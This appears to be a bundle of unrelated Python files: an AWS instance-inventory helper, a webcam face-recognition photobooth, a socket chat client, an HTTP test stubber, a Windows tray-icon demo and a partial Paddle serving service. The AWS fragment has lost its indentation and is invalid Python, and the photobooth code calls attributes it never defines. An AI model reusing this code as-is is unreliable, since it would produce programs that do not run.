                        uncategorized_dict['uncat_instances'][instance_name]['aws_information'] = dict(aws_information_dict)
                        uncategorized_dict['uncat_instances'][instance_name]['aws_tags'] = aws_tags
else:
#if vpc and instance_subnet <>'none':
environment_subnets = self.get_subnets_in_environment(region, vpc, environment)
if instance_subnet in environment_subnets:
count_dict = self.environment_dict['organizations'][organization]['environments'][environment]['regions'][region]
self.count_return_state(instances, count_dict)
count_dict = self.environment_dict['organizations'][organization]['environments'][environment]['regions'][region]['vpc'][vpc]
instance_attribute_dict['status'] = self.count_return_state(instances, count_dict)
instance_attribute_dict['duration'] = self.timedelta_to_duration(self.get_duration(instances))
#create attribute list for each instance running the application for each subnet
stack_subnet_dict = self.environment_dict['organizations'][organization]['environments'][environment]['regions'][region]['vpc'][vpc]['subnets']
if application_name in stack_list:
if instance_subnet not in stack_subnet_dict.keys():
stack_subnet_dict[instance_subnet] = {'instances':{}} #subnets in which the application runs
stack_subnet_dict[instance_subnet]['instances'][instance_name] = {'instance_attributes' : {}, 'aws_information':{}}
stack_subnet_dict[instance_subnet]['instances'][instance_name]['instance_attributes']=dict(instance_attribute_dict)
stack_subnet_dict[instance_subnet]['instances'][instance_name]['aws_information'] = dict(aws_information_dict)
stack_subnet_dict[instance_subnet]['instances'][instance_name]['aws_tags'] = aws_tags
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("awshelper.py", "fetch_aws_instance_info()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_organizations(self):
"""
Fetch all organizations.
"""
try:
(organizations, org_attributes) = self.ah_obj.get_nested_attribute_values(self.get_databag_attrs_fromcache("global_config_data", "atlas_yaml_databag"), "organizations")
return organizations
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_organizations()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_org_attributes(self):
"""
        Fetch the attributes of all organizations.
"""
try:
(organization, org_attributes) = self.ah_obj.get_nested_attribute_values(self.get_databag_attrs_fromcache("global_config_data", "atlas_yaml_databag"), "organizations")
return org_attributes
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_org_attributes()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_attributes_for_organization(self, org_name):
"""
Fetch attributes when a particular organization name is given.
"""
try:
(organization, org_attributes) = self.ah_obj.get_nested_attribute_values(self.get_databag_attrs_fromcache("global_config_data", "atlas_yaml_databag"), "organizations")
if org_name in organization:
return org_attributes[org_name]
else:
raise Exception ("Organization not found!!")
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_org_attributes()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_regions(self):
"""
Return a list of regions.
"""
try:
return self.ah_obj.get_nested_attribute_values(self.get_databag_attrs_fromcache("global_config_data", "atlas_yaml_databag"), "regions")[0]
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_regions()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_region_attributes(self):
"""
Return a dictionary of attributes of all regions.
"""
try:
return self.ah_obj.get_nested_attribute_values(self.get_databag_attrs_fromcache("global_config_data", "atlas_yaml_databag"), "regions")[1]
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_region_attributes()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_attributes_for_region(self, region_name):
"""
Returns the attributes of region given the region name
"""
try:
(regions, region_attributes) = self.ah_obj.get_nested_attribute_values(self.get_databag_attrs_fromcache("global_config_data", "atlas_yaml_databag"), "regions")
if region_name in regions:
return region_attributes[region_name]
else:
return {}
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_attributes_for_region()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_region_id(self, region):
"""
Return region id given region name.
"""
region_id = ""
try:
region_attr = self.get_attributes_for_region(region)
if "id" in region_attr.keys():
region_id = region_attr["id"]
else:
region_id = region
return region_id
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_attributes_for_region()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_vpc_in_region(self, region_name):
"""
        Return the VPCs in the given region.
"""
try:
vpc_list = []
(regions, region_attributes) = self.ah_obj.get_nested_attribute_values(self.get_databag_attrs_fromcache("global_config_data", "atlas_yaml_databag"), "regions")
if region_name in regions:
if 'vpc' in region_attributes[region_name]:
vpc_list = region_attributes[region_name]['vpc'].keys()
if vpc_list is not None:
return vpc_list
else:
pass
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_vpc_in_region()", exp_object, exc_type, exc_obj, exc_tb)
return ["none"]
def get_vpc_by_id(self, vpc_id, region_name):
"""
        Return the VPC name that matches the given VPC id within a region.
"""
try:
vpc_list = []
(regions, region_attributes) = self.ah_obj.get_nested_attribute_values(self.get_databag_attrs_fromcache("global_config_data", "atlas_yaml_databag"), "regions")
if region_name in regions:
if 'vpc' in region_attributes[region_name].keys():
(vpc_list, vpc_attributes) = self.ah_obj.get_nested_attribute_values(region_attributes[region_name],"vpc")
for vpc in vpc_list:
(vpc_keys, vpc_values) = self.ah_obj.get_nested_attribute_values(vpc_attributes, vpc)
if "vpcid" in vpc_keys:
if vpc_values["vpcid"] == vpc_id:
return vpc
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_vpc_in_region()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_subnet_list(self, region, vpc):
"""
        Return the list of subnets for a VPC in the given region.
"""
try:
region_attributes = self.get_attributes_for_region(region)
            vpc_attributes = region_attributes['vpc']
return self.ah_obj.get_nested_attribute_values(vpc_attributes[vpc], "subnets")[0]
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_subnet_list()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_subnets_in_environment(self, region, vpc, environment):
"""
Return all the subnets belonging to an environment in a region and a vpc.
"""
subnet_list = []
try:
if environment == 'uncategorized':
return []
if not vpc:
return []
region_attributes = self.get_attributes_for_region(region)
if 'vpc' in region_attributes.keys():
vpc_attributes = region_attributes['vpc']
subnet_dict = self.ah_obj.get_nested_attribute_values(vpc_attributes[vpc], "subnets")[1]
for subnet, subnet_attr in subnet_dict.iteritems():
if 'env' in subnet_attr:
if subnet_attr['env'] == environment:
subnet_list.append(subnet)
return subnet_list
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_subnets_in_environment()", exp_object, exc_type, exc_obj, exc_tb)
return []
def get_subnet_byid(self, subnet_id, region, vpc):
try:
region_attributes = self.get_attributes_for_region(region)
if 'vpc' in region_attributes.keys():
vpc_attributes = region_attributes['vpc']
subnet_dict = self.ah_obj.get_nested_attribute_values(vpc_attributes[vpc], "subnets")[1]
for subnet, subnet_attr in subnet_dict.iteritems():
if subnet_attr['id'] == subnet_id:
return subnet
return
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_subnet_byid()", exp_object, exc_type, exc_obj, exc_tb)
return []
def get_stack(self):
"""
Returns a list of all stacks.
"""
try:
return self.ah_obj.get_nested_attribute_values(self.get_databag_attrs_fromcache("global_config_data", "atlas_yaml_databag"), "stacks")[0]
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_stack()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_stack_attributes(self):
"""
Return the attribute values of all the stack entries.
"""
try:
return self.ah_obj.get_nested_attribute_values(self.get_databag_attrs_fromcache("global_config_data", "atlas_yaml_databag"), "stacks")[1]
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_stack_attributes()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_profiles_for_stack(self, stack_name):
"""
Returns the profiles associated with the stack.
"""
try:
(stack,stack_attributes) = self.ah_obj.get_nested_attribute_values(self.get_databag_attrs_fromcache("global_config_data", "atlas_yaml_databag"), "stacks")
if stack_name in stack:
profile_list = self.ah_obj.get_nested_attribute_values(stack_attributes[stack_name],"profiles")
return profile_list[0] if profile_list else []
else:
raise Exception ("Profile not found !!")
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_profiles_for_stack()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_profiles(self):
"""
Fetch a list of all profiles.
"""
try:
return self.ah_obj.get_nested_attribute_values(self.get_databag_attrs_fromcache("global_config_data", "atlas_yaml_databag"), "profiles")[0]
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_profiles()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_profile_attributes(self):
"""
Fetch profile attributes.
"""
try:
return self.ah_obj.get_nested_attribute_values(self.get_databag_attrs_fromcache("global_config_data", "atlas_yaml_databag"), "profiles")[1]
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_profile_attributes()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_environments(self, organization):
"""
Retrieve all environments given an organization name.
"""
try:
env_list = self.ah_obj.get_nested_attribute_values(self.get_org_attributes(), "env")[0]
return env_list
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_environments()", exp_object, exc_type, exc_obj, exc_tb)
return {}
def get_env_subnets(self, organization, region, vpc):
try:
env_subnet_dict = {}
environments = self.get_environments(organization)
for env in environments:
subnet_list = self.get_subnets_in_environment(region, vpc, env)
for subnet in subnet_list:
env_subnet_dict[subnet, vpc, region] = env
return env_subnet_dict
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_env_subnets()", exp_object, exc_type, exc_obj, exc_tb)
return
def regions_for_env(self):
"""
Return the regions in which an environment exists.
"""
region_dict = collections.defaultdict(dict)
try:
organizations_list = self.get_organizations()
for organization in organizations_list:
region_dict['uncategorized'] = self.get_regions()
region_list = self.get_regions()
for region in region_list:
region_attributes = self.get_attributes_for_region(region)
if 'vpc' in region_attributes.keys():
vpc_attributes = region_attributes['vpc']
for vpc in vpc_attributes.keys():
subnet_dict = self.ah_obj.get_nested_attribute_values(vpc_attributes, "subnets")[1]
for environment in self.get_environments(organization):
region_dict[environment] = []
for subnet, subnet_attr in subnet_dict.iteritems():
if subnet_attr.has_key("env"):
if subnet_attr['env'] == environment and region not in region_dict[environment]:
region_dict[environment].append(region)
return dict(region_dict)
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_regions_for_env()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_aws_connection(self, region):
"""
Return an AWS connection object.
"""
try:
region_id = self.get_region_id(region);
key_id = os.environ.get('AWS_ACCESS_KEY_ID')
secret_key = os.environ.get('AWS_SECRET_ACCESS_KEY')
connection = boto.ec2.connect_to_region(region_id,aws_access_key_id=key_id,
aws_secret_access_key=secret_key)
return connection
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_aws_connection()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_aws_instances(self, connection):
"""
Get all AWS instances.
"""
try:
all_reservations_list = connection.get_all_instances()
all_instances_list = [instances for reservations in all_reservations_list for instances in reservations.instances]
return all_instances_list
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_aws_instances()", exp_object, exc_type, exc_obj, exc_tb)
return
#get all environments and corresponding subnets from json file
def get_environment_subnets_details(self):
try:
subnet_list = []
organization_list = self.get_organizations()
if organization_list is not None:
for organization in organization_list:
environment_list = self.get_environments(organization)
environment_list.append("uncategorized");
for environment in environment_list:
if environment == "uncategorized":
subnet_list.append(['none', '(not set)'])
region_list = self.get_regions()
if region_list is not None:
for region in region_list:
vpc_list= self.get_vpc_in_region(region)
if vpc_list is not None:
for vpc in vpc_list:
subnet_list.append(self.get_subnets_in_environment(region, vpc, environment))
return zip(environment_list, subnet_list)
except Exception as exp_object:
self.ah_obj = AtlasHelper()
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("cloudability.py", "get_env_subnets()", exp_object, exc_type, exc_obj, exc_tb)
return ([],[])
def get_dash_environments(self):
"""
Get all environments for dashboard display.
"""
organizations = self.get_organizations()
environment_list=[]
environment_groups = self.ah_obj.get_atlas_config_data('global_config_data', 'environment_groups')
for organization in organizations:
environment_list = self.get_environments(organization)
for environment in environment_list:
if environment in environment_groups[0]:
for group_member in environment_groups[1][environment]:
if environment != group_member:
environment_list.remove(group_member)
environment_list.append('uncategorized')
environment_list.append('all')
return environment_list
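# --- usage sketch (assumption, not part of the original module) ---
# Shows the intended read path: pull the cached instance tree (the cache is
# refreshed in the background when stale) and walk organizations ->
# environments, mirroring the dictionary built above.
def _example_list_environments():
    helper = AwsHelper()
    details = helper.get_instances_details() or {}
    environments = []
    for org_data in details.get('organizations', {}).values():
        environments.extend(org_data.get('environments', {}).keys())
    return environments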
|
photoboothapp.py
|
# import the necessary packages
import tkinter as tki
from PIL import Image
from PIL import ImageTk
import cv2
import threading
import imutils
import datetime
import os
import time
import traceback
import shutil
# FaceAnalyzer
import dlib
import numpy as np
from keras.models import load_model
import glob
from imutils import face_utils
import fr_utils
import tensorflow as tf
class PhotoBoothApp:
def __new__(cls, video_stream, outputPath):
if outputPath[0:2] == './':
return super(PhotoBoothApp, cls).__new__(cls)
else:
raise ValueError(' The output path must be in the current directory.')
def __init__(self, video_stream, outputPath):
# store the video stream object and output path, then initialize
# the most recently read frame, thread for reading frames, and
# the thread stop event
self.vs = video_stream
self.outputPath = outputPath
if not os.path.isdir(self.outputPath):
os.mkdir(self.outputPath)
self.face_analyzer = FaceAnalyzer(self.outputPath, self)
self.frame = None
self.thread = None
self.stopEvent = None
# initialize the root window and image panel
self.root = tki.Tk()
self.panel = None
self.buildTkInterface()
# start a thread that constantly pools the video sensor for
# the most recently read frame
self.stopEvent = threading.Event()
self.thread = threading.Thread(target=self.videoLoop, args=())
self.thread.start()
def buildTkInterface(self):
# create a button, that when pressed, will take the current
# frame and save it to file
# set a callback to handle when the window is closed
self.root.wm_title("PyImageSearch PhotoBooth")
self.root.wm_protocol("WM_DELETE_WINDOW", self.onClose)
btn = tki.Button(self.root, text="Snapshot!",
command=self.takeSnapshot)
btn.pack(side="bottom", fill="both", expand="yes", padx=10,
pady=10)
btn = tki.Button(self.root, text="Flush Database!",
command=self.flushDatabase)
btn.pack(side="bottom", fill="both", expand="yes", padx=10,
pady=10)
tki.Label(self.root, text= 'Qui es tu ?').pack()
self.name_text = tki.StringVar()
self.name_widget = tki.Entry(self.root, textvariable = self.name_text)
self.name_widget.pack()
self.alert_text = tki.StringVar()
self.alert_widget = tki.Label(self.root, textvariable = self.alert_text)
self.alert_widget.pack()
self.listbox = tki.Listbox(self.root)
self.listbox.pack()
faces = [os.path.splitext(filename)[0] for filename in os.listdir(self.outputPath)]
[self.listbox.insert(tki.END,face) for face in faces]
def verifSnapshot(self, new_filename):
print(self.name_text)
if not os.path.isdir(self.outputPath):
return False
if new_filename == ".jpg":
self.alert_text.set("Tu as oublié le prénom ! >o<")
self.alert_widget.config(fg="red")
return False
if not os.path.isfile("./people/" + new_filename):
self.alert_text.set("Visage ajouté avec succès ! ^o^")
self.alert_widget.config(fg="green")
return True
else:
self.alert_text.set("Cette personne existe déja ! >o<")
self.alert_widget.config(fg="red")
return False
def flushDatabase(self):
if self.outputPath[0:2] == './':
shutil.rmtree(self.outputPath)
os.mkdir(self.outputPath)
self.alert_text.set("Base de données vidée ! 'v'")
self.alert_widget.config(fg="green")
self.listbox.delete(0, tki.END)
self.face_analyzer.reload_database()
def videoLoop(self):
try:
while not self.stopEvent.is_set():
(_, init_frame) = self.vs.read()
self.frame = imutils.resize(init_frame, width=300)
with graph.as_default():
frame_faces = self.face_analyzer.add_face_boxes()
image = cv2.cvtColor(frame_faces, cv2.COLOR_BGR2RGB)
image = Image.fromarray(image)
image = ImageTk.PhotoImage(image)
if self.panel is None:
self.panel = tki.Label(image=image)
self.panel.image = image
self.panel.pack(side="left", padx=10, pady=10)
else:
self.panel.configure(image=image)
self.panel.image = image
self.root.quit()
print('[INFO] end of video thread.')
except Exception as e:
print(e)
traceback.print_exc()
print("[INFO] caught a RuntimeError")
self.root.quit()
def takeSnapshot(self):
name = self.name_widget.get()
filename = "{}.jpg".format(name)
if self.verifSnapshot(filename):
p = os.path.sep.join((self.outputPath, filename))
# save the file
face = self.face_analyzer.get_soloface_image()
cv2.imwrite(p, face)
print("[INFO] saved {}".format(filename))
self.listbox.insert(tki.END, name)
self.face_analyzer.reload_database()
def onClose(self):
print("[INFO] closing...")
self.stopEvent.set()
time.sleep(1)
self.root.quit()
class FaceAnalyzer:
def __init__(self, outputPath, photobooth_app):
self.outputPath = outputPath
self.database = {}
self.FRmodel = load_model('face-rec_Google.h5')
global graph
graph = tf.get_default_graph()
self.detector = dlib.get_frontal_face_detector()
self.photobooth_app = photobooth_app
self.reload_database()
def reload_database(self):
self.database = {}
# load all the images of individuals to recognize into the database
for photo_filename in glob.glob("%s/*" % (self.outputPath)):
photo_object = cv2.imread(photo_filename)
identity = os.path.splitext(os.path.basename(photo_filename))[0]
self.database[identity] = fr_utils.img_path_to_encoding(photo_filename, self.FRmodel)
def add_face_boxes(self):
frame_copy = self.photobooth_app.frame.copy()
faces = self.detector(frame_copy)
x, y, w, h = 0, 0, 0, 0
if len(faces) > 0:
for face in faces:
try:
(x, y, w, h) = face_utils.rect_to_bb(face)
cv2.rectangle(frame_copy, (x, y), (x + w, y + h), (255, 255, 0), 2)
face_image = frame_copy[y:y + h, x:x + w].copy()
name, min_dist = self.recognize_face(face_image)
if min_dist < 0.15:
cv2.putText(frame_copy, "Face : " + name, (x, y - 50), cv2.FONT_HERSHEY_PLAIN, 1.5, (0, 255, 0), 2)
cv2.putText(frame_copy, "Dist : " + str(min_dist), (x, y - 20), cv2.FONT_HERSHEY_PLAIN, 1.5, (0, 255, 0), 2)
else:
cv2.putText(frame_copy, 'No matching faces', (x, y - 20), cv2.FONT_HERSHEY_PLAIN, 1.5, (0, 0, 255), 2)
except Exception as e:
print(e)
return frame_copy
def get_soloface_image(self):
frame_copy = self.photobooth_app.frame
faces = self.detector(frame_copy)
if len(faces) == 0:
self.alert_text.set("Aucun visage à l'horizon ! >o<")
self.alert_widget.config(fg="red")
return False
if len(faces) == 1:
try:
face = faces[0]
(x, y, w, h) = face_utils.rect_to_bb(face)
face_image = frame_copy[y:y + h, x:x + w]
            except Exception as e:
                print(e)
                return False
            return face_image
if len(faces) > 1:
self.alert_text.set("Il y a plusieurs visages ! >o<")
self.alert_widget.config(fg="red")
return False
def recognize_face(self, face_descriptor):
encoding = fr_utils.img_to_encoding(face_descriptor, self.FRmodel)
min_dist = 100
identity = None
# Loop over the database dictionary's names and encodings.
for (name, db_enc) in self.database.items():
# Compute L2 distance between the target "encoding" and the current "emb" from the database.
dist = np.linalg.norm(db_enc - encoding)
print('distance for %s is %s' % (name, dist))
# If this distance is less than the min_dist, then set min_dist to dist, and identity to name
if dist < min_dist:
min_dist = dist
identity = name
return identity, min_dist
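# --- usage sketch (assumption, not part of the original module) ---
# The launcher for PhotoBoothApp is not included above; this shows how it is
# presumably wired to a webcam. The camera index and output directory are
# hypothetical, but the path must start with './' to satisfy __new__.
if __name__ == '__main__':
    video_stream = cv2.VideoCapture(0)
    booth = PhotoBoothApp(video_stream, './people')
    booth.root.mainloop()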
|
client.py
|
import socket
import threading
class Client:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
message = ""
server_address = 0
def welcome(self):
print("Welcome, please enter the address of the connection you want to reach")
try:
address = input("Address: ")
port = input("Port: ")
print("Connecting to "+address+":"+port+"...")
return (address, int(port))
except:
return ("0.0.0.0", 0)
def send_command(self):
while True:
self.message = input(">> ")
self.s.sendall(self.message.encode())
if self.message == "exit":
break
def __init__(self):
self.server_address = self.welcome()
def connect(self):
try:
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect(self.server_address)
        except:
            print("An error has occurred")
            return
thread = threading.Thread(target=self.send_command)
thread.daemon = True
thread.start()
while True:
server_message = self.s.recv(2048)
if not server_message:
break
print(server_message.decode())
if self.message == "exit":
print("Exiting...")
break
self.s.close()
client = Client()
client.connect()
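# --- usage sketch (assumption, not part of the original module) ---
# A throwaway echo server for exercising the client above: it accepts a single
# connection and echoes every command back until "exit" arrives. The port is a
# hypothetical placeholder; run it in a separate process before the client.
def _example_echo_server(port=9999):
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind(("0.0.0.0", port))
    server.listen(1)
    conn, _ = server.accept()
    while True:
        data = conn.recv(2048)
        if not data or data.decode() == "exit":
            break
        conn.sendall(data)
    conn.close()
    server.close()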
|
http_stubber.py
|
# Copyright 2017 The WPT Dashboard Project. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import BaseHTTPServer
import json
import threading
import urllib2
class HTTPStubber(object):
'''An HTTP server which forwards errors raised during request handling to
the main thread.'''
class Handler(BaseHTTPServer.BaseHTTPRequestHandler):
        def log_message(self, *args):
pass
def do_GET(self):
return self.do()
def do_POST(self):
return self.do()
def do(self):
stubber = self.server.stubber
try:
stubber.on_request(self)
except Exception as e:
# In order to make test failure messages more intuitive,
# exceptions raised during command processing should be caught
# and reported to the main thread (where they can be
# subsequently re-raised).
stubber.exception = e
stubber._exception_lock.release()
def __init__(self, port=0):
self._server = BaseHTTPServer.HTTPServer(('', port), self.Handler)
self._server.stubber = self
self._exception_lock = threading.Lock()
self._exception_lock.acquire()
self.exception = None
def on_request(self, http_handler):
http_handler.send_response(200, 'OK')
http_handler.end_headers()
@property
def port(self):
return self._server.server_port
def stop(self):
self._server.shutdown()
def start(self):
'''Run the server and block until `stop` is invoked or until an
exception is raised during HTTP request handling.'''
def interrupt_on_exception(stubber):
            stubber._exception_lock.acquire()
stubber.stop()
threading.Thread(target=interrupt_on_exception, args=(self,)).start()
# The following call will block until the `stop` method is invoked,
# either explicitly by the user or as a result of an exception being
# raised during request handling.
self._server.serve_forever(0.1)
if self.exception:
raise self.exception
else:
# If no exception is present, the server was stopped via an
# external call to the `stop` method, and the thread dedicated to
# detecting exceptions is still waiting. Release the lock so that
# thread exits cleanly.
self._exception_lock.release()
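# --- usage sketch (assumption, not part of the original module) ---
# Shows the intended test pattern: serve on a background thread, issue a
# request with urllib2 (already imported above), then stop the stubber. Any
# exception raised inside on_request is re-raised by start().
def _example_exercise_stubber():
    stubber = HTTPStubber()
    server_thread = threading.Thread(target=stubber.start)
    server_thread.start()
    try:
        urllib2.urlopen('http://localhost:%d/' % stubber.port).read()
    finally:
        stubber.stop()
        server_thread.join()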
|
sys_tray.py
|
#encoding:utf-8
''' Flash windows tray icon sample code '''
from Tkinter import Tk, Menu
import tkMessageBox
import os
import time
import threading
icon_state = False # Show icon0 when False, else show icon1
tray_root_menu = None
tray_menu = None
show_main_menu_callback = None
def flash_icon(root,icon):
global icon_state
print (root,icon)
while True:
root.tk.call('winico', 'taskbar', 'modify', icon,
'-pos', int(not icon_state), '-text', u'Flash Icon APP')
icon_state = not icon_state
time.sleep(0.5)
def menu_func(event, x, y):
if event == 'WM_RBUTTONDOWN': # Right click tray icon, pop up menu
tray_menu.tk_popup(x, y)
elif event == 'WM_LBUTTONDOWN' or event == 'WM_LBUTTONDBLCLK': # (double) click tray icon, pop up main menu
if show_main_menu_callback is not None:
show_main_menu_callback()
tray_root_menu.deiconify()
#else: #WM_LBUTTONDBLCLK
# print ('event:%s\n'%event)
def say_hello():
tkMessageBox.showinfo('msg', 'you clicked say hello button.')
class win_sys_tray():
    def __init__(self):
self.__root = None
self.__sysTray = None
self.__trayIcons = None
self.__tips_title = None
def sys_tray_init(self,tips_title,root,icon_path,show_callback,ports_change_refresh,quit_callback=None):
global tray_menu
global show_main_menu_callback
show_main_menu_callback = show_callback
if root is None:
root = Tk()
self.__root = root
self.__tips_title = tips_title
if icon_path is None:
icon_path = os.path.join(os.getcwd(), 'earth.ico')
#print (root,icon_path)
root.tk.call('package', 'require', 'Winico')
self.__trayIcons = root.tk.call('winico', 'createfrom', icon_path) # New icon resources
tray_menu = Menu(root, tearoff=0)
tray_menu.add_command(label='Test Hello', command=say_hello)
if quit_callback is None:
tray_menu.add_command(label='Quit', command=root.quit)
else:
tray_menu.add_command(label='Quit', command=quit_callback)
#thread_param = (root,icon)
#t = threading.Thread(target=flash_icon,args=thread_param) # Create a new thread
#t.setDaemon(True)
#t.start()
#root.withdraw()
def sys_tray_stay(self):
self.__root.withdraw()
global tray_root_menu
tray_root_menu = self.__root
self.__root.tk.call('winico', 'taskbar', 'add', self.__trayIcons,
'-callback', (self.__root.register(menu_func), '%m', '%x', '%y'),
'-pos',0,
'-text',self.__tips_title)
def sys_tray_quit(self):
self.__root.tk.call('winico', 'taskbar', 'del', self.__trayIcons)
def sys_tray_leave(self):
self.__root.tk.call('winico', 'taskbar', 'del', self.__trayIcons)
self.__root.deiconify()
def sys_tray_loop(self):
self.__root.mainloop()
if __name__ == '__main__':
    tray = win_sys_tray()
    tray.sys_tray_init('tray demo', None, None, None, None)
    tray.sys_tray_stay()
    #tray.sys_tray_leave()
    tray.sys_tray_loop()
|
web_service.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!flask/bin/python
# pylint: disable=doc-string-missing
from flask import Flask, request, abort
from contextlib import closing
from multiprocessing import Pool, Process, Queue
from paddle_serving_client import Client
from deploy.paddle_serving_server_flask import OpMaker, OpSeqMaker, Server
from deploy.paddle_serving_server_flask.serve import start_multi_card
import socket
import sys
import numpy as np
import os
from deploy.paddle_serving_server_flask import pipeline
from deploy.paddle_serving_server_flask.pipeline import Op
def port_is_available(port):
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.settimeout(2)
result = sock.connect_ex(('0.0.0.0', port))
if result != 0:
return True
else:
return False
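# --- usage sketch (assumption, not part of the original module) ---
# port_is_available() treats a failed connect_ex() as "nothing is listening",
# i.e. the port is free. prepare_server() below starts probing at 12000; this
# helper just returns the first free port in that range.
def _example_first_free_port(start=12000, attempts=1000):
    for offset in range(attempts):
        if port_is_available(start + offset):
            return start + offset
    return None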
class WebService(object):
def __init__(self, name="default_service"):
self.name = name
# pipeline
self._server = pipeline.PipelineServer(self.name)
self.gpus = [] # deprecated
self.rpc_service_list = [] # deprecated
def get_pipeline_response(self, read_op):
return None
def prepare_pipeline_config(self, yaml_file):
# build dag
read_op = pipeline.RequestOp()
last_op = self.get_pipeline_response(read_op)
if not isinstance(last_op, Op):
raise ValueError("The return value type of `get_pipeline_response` "
"function is not Op type, please check function "
"`get_pipeline_response`.")
response_op = pipeline.ResponseOp(input_ops=[last_op])
self._server.set_response_op(response_op)
self._server.prepare_server(yaml_file)
def run_service(self):
self._server.run_server()
def load_model_config(self,
server_config_dir_paths,
client_config_path=None):
if isinstance(server_config_dir_paths, str):
server_config_dir_paths = [server_config_dir_paths]
elif isinstance(server_config_dir_paths, list):
pass
for single_model_config in server_config_dir_paths:
if os.path.isdir(single_model_config):
pass
elif os.path.isfile(single_model_config):
raise ValueError(
"The input of --model should be a dir not file.")
self.server_config_dir_paths = server_config_dir_paths
from .proto import general_model_config_pb2 as m_config
import google.protobuf.text_format
file_path_list = []
for single_model_config in self.server_config_dir_paths:
file_path_list.append("{}/serving_server_conf.prototxt".format(
single_model_config))
model_conf = m_config.GeneralModelConfig()
f = open(file_path_list[0], 'r')
model_conf = google.protobuf.text_format.Merge(
str(f.read()), model_conf)
self.feed_vars = {var.name: var for var in model_conf.feed_var}
if len(file_path_list) > 1:
model_conf = m_config.GeneralModelConfig()
f = open(file_path_list[-1], 'r')
model_conf = google.protobuf.text_format.Merge(
str(f.read()), model_conf)
self.fetch_vars = {var.name: var for var in model_conf.fetch_var}
        if client_config_path is None:
self.client_config_path = file_path_list
def set_gpus(self, gpus):
print("This API will be deprecated later. Please do not use it")
self.gpus = [int(x) for x in gpus.split(",")]
def default_rpc_service(self,
workdir="conf",
port=9292,
gpuid=0,
thread_num=2,
mem_optim=True,
use_lite=False,
use_xpu=False,
ir_optim=False,
precision="fp32",
use_calib=False):
device = "gpu"
if gpuid == -1:
if use_lite:
device = "arm"
else:
device = "cpu"
op_maker = OpMaker()
op_seq_maker = OpSeqMaker()
read_op = op_maker.create('general_reader')
op_seq_maker.add_op(read_op)
for idx, single_model in enumerate(self.server_config_dir_paths):
infer_op_name = "general_infer"
if len(self.server_config_dir_paths) == 2 and idx == 0:
infer_op_name = "general_detection"
